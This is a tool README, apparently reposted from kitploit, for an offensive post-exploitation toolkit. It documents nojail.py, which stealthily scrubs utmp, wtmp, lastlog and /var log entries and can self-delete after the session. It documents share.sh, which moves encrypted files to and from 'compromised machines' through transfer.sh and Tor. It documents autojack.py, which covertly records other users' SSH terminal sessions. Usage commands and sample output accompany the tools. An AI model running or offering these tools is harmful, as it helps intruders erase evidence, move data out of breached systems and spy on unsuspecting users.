Freedom Fighting - A collection of scripts which may come in handy during your freedom fighting activities
Freedom Fighting scripts
This repository contains scripts which may come in handy during your freedom fighting activities. It will be updated occasionally, when I find myself in need of something I can't find online. Everything here is distributed under the terms of the GPL v3 License.
nojail.py
A log cleaner which removes incriminating entries in:
/var/run/utmp
,/var/log/wtmp
,/var/log/btmp
(controls the output of thewho
,w
andlast
commands)/var/log/lastlog
(controls the output of thelastlog
command)/var/**/*.log
(.log.1, .log.2.gz, etc. included)- Any additional file or folder designated by the user
Special care is taken to avoid breaking file descriptors while tampering with logs. This means logs continue to be written to after they've been tampered with, making the cleanup a lot less conspicuous. All the work takes place in a tmpfs drive and any files created are wiped securely.
Warning: The script has only been tested on Linux and will not be able to clean UTMP entries on other Unix flavors.
Usage:
usage: nojail.py [-h] [--user USER] [--ip IP] [--hostname HOSTNAME]
[--verbose] [--check]
[log_files [log_files ...]]
Stealthy log file cleaner.
positional arguments:
log_files Specify any log files to clean in addition to
/var/**/*.log.
optional arguments:
-h, --help show this help message and exit
--user USER, -u USER The username to remove from the connexion logs.
--ip IP, -i IP The IP address to remove from the logs.
--hostname HOSTNAME The hostname of the user to wipe. Defaults to the rDNS
of the IP.
--verbose, -v Print debug messages.
--check, -c If present, the user will be asked to confirm each
deletion from the logs.
--daemonize, -d Start in the background and delete logs when the
current session terminates. Implies --self-delete.
--self-delete, -s Automatically delete the script after its execution.
By default, if no arguments are given, the script will try to determine the IP address to scrub based on the SSH_CONNECTION
environment variable. Any entry matching the reverse DNS of that IP will be removed as well.Basic example:
./nojail.py --user root --ip 151.80.119.32 /etc/app/logs/access.log --check
...will remove all entries for the user root where the IP address is 151.80.119.32 or the hostame is manalyzer.org
. The user will also be prompted before deleting each record because of the --check
option. Finally, the file /etc/app/logs/access.log
will be processed in addition to all the default ones.If folders are given as positional arguments (
/etc/app/logs/
for instance), the script will recursively crawl them and clean any file with the .log
extension (*.log.1, *.log.2.gz, etc. included).Daemonizing the script
./nojail.py --daemonize
Assuming this is run from an SSH connexion, this command will delete all logs pertaining to the current user's activity with the detected IP address and hostname right after the connexion is closed. This script will subsequently automatically delete itself. Please bear in mind that you won't have any opportunity to receive error messages from the application. You are encouraged to try deleting the logs once before spawning the demon to make sure that the arguments you specified are correct.Sample output:
root@proxy:~# ./nojail.py
[ ] Cleaning logs for root (XXX.XXX.XXX.XXX - domain.com).
[*] 2 entries removed from /var/run/utmp!
[*] 4 entries removed from /var/log/wtmp!
[ ] No entries to remove from /var/log/btmp.
[*] Lastlog set to 2017-01-09 17:12:49 from pts/0 at lns-bzn-37-79-250-104-19.adsl.proxad.net
[*] 4 lines removed from /var/log/nginx/error.log!
[*] 11 lines removed from /var/log/nginx/access.log!
[*] 4 lines removed from /var/log/auth.log!
Disclaimer
This script is provided without any guarantees. Don't blame me it doesn't wipe all traces of something you shouldn't have done in the first place.
share.sh
A portable and secure file sharing script. While freedom fighting, it is generally not possible to scp files into compromised machines. Alternate ways to upload files are needed, but most sharing services are either too restrictive or do not provide a way to retrieve files easily from the command line. Security considerations may also prevent people from uploading sensitive files to cloud providers for fear that they will keep a copy of it forever.
This small and portable bash script relies on transfer.sh to solve that problem. It...
- Encrypts files before uploading them (symmetric AES-256-CBC).
- Automatically uses
torify
if it is present on the system for increased anonimity.
openssl
and either curl
or wget
.Usage
root@proxy:~# ./share.sh ~/file_to_share "My_Secure_Encryption_Key!"
Success! Retrieval command: ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
root@proxy:~# ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
File retrieved successfully!
Additional arguments during the upload allow you to control the maximum number of downloads allowed for the file (-m
) and how many days transfer.sh will keep it (-d
). The default value for both these options is 1.Warning: Do not use spaces in the encryption key, or only the first word of your passphrase will be taken into account. This is due to the way
getopts
handles arguments (I think). Pull requests are welcome if anyone is interested in fixing this.autojack.py
AutoJack is a short script leveraging EmptyMonkey's shelljack to log the terminal of any user connecting through SSH. It watches
auth.log
for successful connections, figures out the PID of the user's bash
process,and leaves the rest to shelljack
.Launch it in a screen, and wait until other users log-in. Their session will be logged to
/root/.local/sj.log.[user].[timestamp]
.The script is not particularly stealthy (no attempt is made to hide the
shelljack
process) but it will get the job done. Note that to avoid self-incrimination, the root
user is not targeted (this can be trivially commented out in the code).Source: www.kitploit.com
Freedom Fighting - A collection of scripts which may come in handy during your freedom fighting activities
Reviewed by Anonymous
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